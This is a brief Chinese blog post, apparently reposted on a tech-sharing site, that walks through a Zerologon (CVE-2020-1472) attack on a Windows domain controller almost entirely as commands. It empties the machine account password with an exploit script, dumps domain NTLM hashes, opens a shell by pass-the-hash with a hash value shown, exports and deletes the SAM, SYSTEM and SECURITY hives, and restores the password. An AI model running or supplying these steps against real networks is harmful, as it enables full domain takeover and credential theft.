标签:zerologon CVE py 192.168 1472 1.105 security save python3
全程无图--因为是我编的
- 域控 : windows 2008 R2 192.168.1.105 mrhonest.com
第一步,将域控机器帐号密码设置为"空"
python3 cve-2020-1472-exploit.py -n dc -t 192.168.1.105
第二步,使用"空"密码dump域内帐号的ntlm hash
python3 secretsdump.py -no-pass -just-dc dc\$@192.168.1.105
第三步,获取域控shell 和 导出域控计算机帐户的原始NT哈希,为了恢复域控机器帐号的密码
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8e4fcbdb45dd4b00370003f066535a64 mrhonest.com/administrator@192.168.1.105
第四步,导出注册表文件
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
第五步,本地获取域控计算机帐户的原始NT哈希
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
第六步,恢复域控机器帐号密码
python3 reinstall_original_pw.py dc 192.168.1.105 $MACHINE.ACC:plain_password_hex的值
标签:zerologon,CVE,py,192.168,1472,1.105,security,save,python3 来源: https://www.cnblogs.com/mrhonest/p/14306445.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。